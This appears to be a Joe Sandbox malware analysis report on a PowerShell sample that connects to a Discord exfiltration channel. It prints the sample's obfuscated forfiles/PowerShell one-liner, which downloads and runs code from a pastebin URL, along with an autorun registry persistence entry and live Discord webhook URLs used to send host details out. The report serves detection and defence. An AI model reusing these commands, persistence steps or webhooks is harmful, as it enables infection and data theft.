Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cr_asm_phshop..ps1

Overview

General Information

Sample name:cr_asm_phshop..ps1
Analysis ID:1534236
MD5:9b9b244463f60b1dac6de55348e5f8ba
SHA1:807d2d5798c6e8c38005ec67aa99047d376a8248
SHA256:0951b829656b1290815cd18149305f6abca2a5b4b22c465dcf903af632790cdf
Tags:Neth3Nps1user-JAMESWT_MHT
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 3552 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_phshop..ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 6164 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • forfiles.exe (PID: 5480 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 6880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6540 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5884 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 3396 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 4496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6676 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 6592 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 3552INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x1273d1:$b1: ::WriteAllBytes(
  • 0x150998:$b1: ::WriteAllBytes(
  • 0x15b9ae:$b1: ::WriteAllBytes(
  • 0x33003:$s1: -join
  • 0x400d8:$s1: -join
  • 0x434aa:$s1: -join
  • 0x43b5c:$s1: -join
  • 0x4564d:$s1: -join
  • 0x47853:$s1: -join
  • 0x4807a:$s1: -join
  • 0x488ea:$s1: -join
  • 0x49025:$s1: -join
  • 0x49057:$s1: -join
  • 0x4909f:$s1: -join
  • 0x490be:$s1: -join
  • 0x4990e:$s1: -join
  • 0x49a8a:$s1: -join
  • 0x49b02:$s1: -join
  • 0x49b95:$s1: -join
  • 0x49dfb:$s1: -join
  • 0x4bf91:$s1: -join
Process Memory Space: powershell.exe PID: 5884INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x3856f:$b1: ::WriteAllBytes(
  • 0x148bda:$b1: ::WriteAllBytes(
  • 0x1d718:$s1: -join
  • 0x1de79:$s1: -join
  • 0xb5e64:$s1: -join
  • 0xbf44a:$s1: -join
  • 0xf9792:$s3: reverse
  • 0xf9a80:$s3: reverse
  • 0xfa19a:$s3: reverse
  • 0xfa953:$s3: reverse
  • 0x101a7c:$s3: reverse
  • 0x101e96:$s3: reverse
  • 0x102a1e:$s3: reverse
  • 0x1036cb:$s3: reverse
  • 0x112772:$s3: reverse
  • 0x11c639:$s3: reverse
  • 0x14d758:$s3: reverse
  • 0x159008:$s3: reverse
  • 0x168284:$s3: reverse
  • 0x16eed9:$s3: reverse
  • 0x170ec4:$s3: reverse

Other

SourceRuleDescriptionAuthorStrings
amsi64_5884.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process
amsi64_6592.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process

Sigma Signatures

System Summary

barindex
Sigma detected: Suspicious PowerShell Parameter Substring
Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', CommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'", ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 5480, ParentProcessName: forfiles.exe, ProcessCommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', ProcessId: 6540, ProcessName: powershell.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_phshop..ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_phshop..ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_phshop..ps1", ProcessId: 3552, ProcessName: powershell.exe
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3552, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_phshop..ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_phshop..ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_phshop..ps1", ProcessId: 3552, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T18:09:26.951719+020028576591A Network Trojan was detected192.168.2.849718162.159.128.233443TCP
2024-10-15T18:09:34.743607+020028576591A Network Trojan was detected192.168.2.849719162.159.128.233443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T18:09:11.100795+020028576581A Network Trojan was detected192.168.2.849707162.159.128.233443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.2% probability
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.8:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.8:49719 version: TLS 1.2
Source: Binary string: softy.pdbll source: powershell.exe, 00000008.00000002.1906330192.000001D636E11000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000C.00000002.2002415308.000001F8DE949000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000C.00000002.2002415308.000001F8DE9A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1907933028.000001D6370C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 0000000C.00000002.2002415308.000001F8DE9A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000008.00000002.1866332209.000001D61CD98000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb! source: powershell.exe, 00000008.00000002.1907933028.000001D6370C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb3 source: powershell.exe, 0000000C.00000002.2002415308.000001F8DE949000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb[n source: powershell.exe, 0000000C.00000002.2002415308.000001F8DE9A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1907933028.000001D6370C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000C.00000002.2002415308.000001F8DE9A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.2002415308.000001F8DE9C2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb9 source: powershell.exe, 00000008.00000002.1907933028.000001D6370C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb! source: powershell.exe, 00000008.00000002.1907933028.000001D6370C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb/ source: powershell.exe, 00000008.00000002.1906732585.000001D636E51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: powershell.exe, 0000000C.00000002.2002415308.000001F8DE949000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1907933028.000001D6370C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1999497384.000001F8DE6BE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000008.00000002.1906732585.000001D636E51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000C.00000002.2002415308.000001F8DEA07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbs0 source: powershell.exe, 00000008.00000002.1907933028.000001D6370C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000C.00000002.2001836314.000001F8DE8B0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000C.00000002.2002415308.000001F8DE949000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb} source: powershell.exe, 0000000C.00000002.2002415308.000001F8DE949000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbo source: powershell.exe, 00000008.00000002.1909922743.000001D6370F8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000008.00000002.1907933028.000001D63709A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2002415308.000001F8DE949000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbj source: powershell.exe, 0000000C.00000002.2002415308.000001F8DE9C2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb3 source: powershell.exe, 00000008.00000002.1907933028.000001D6370C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb4p source: powershell.exe, 00000008.00000002.1907933028.000001D6370C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1907933028.000001D6370C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdberShell.Commands.Utility.pdb source: powershell.exe, 00000008.00000002.1909922743.000001D6370F8000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.8:49718 -> 162.159.128.233:443
Source: Network trafficSuricata IDS: 2857658 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Registration : 192.168.2.8:49707 -> 162.159.128.233:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.8:49719 -> 162.159.128.233:443
Connects to a pastebin service (likely for C&C)
Source: unknownDNS query: name: pastebin.com
Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox ViewIP Address: 162.159.128.233 162.159.128.233
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: POST /api/webhooks/1295751633158013021/9BlOhZ44xUrKpF4r8Of10VnlPL1j_-N82dLUs1Hltnp-q8JOliKVAh5eIY85DUg3JNh4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 216Expect: 100-continueConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 298Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 298Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: pastebin.com
Source: global trafficDNS traffic detected: DNS query: discord.com
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: unknownHTTP traffic detected: POST /api/webhooks/1295751633158013021/9BlOhZ44xUrKpF4r8Of10VnlPL1j_-N82dLUs1Hltnp-q8JOliKVAh5eIY85DUg3JNh4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 216Expect: 100-continueConnection: Keep-Alive
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 16:09:26 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729008568x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gmtijUgBinxuq7zBWFRnhoCLKR%2B%2BoimY%2B16PB4QRuNrOwIO83B4YJvDfsk%2BjXHTYHnKaVzDZSlkIWEPSrtkiSQw2ECTA5c9X7pKQyU51gR2KQdQbrjt5Qw25a8Kj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=4a7684d1b691875bfc1ab7beaff2ce99f545807f-1729008566; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=Wuj7nTdvMmmBf0zYtoS7fuUf5md1P3E7f.b6keOLwE4-1729008566891-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d3112d67de06bf6-DFW
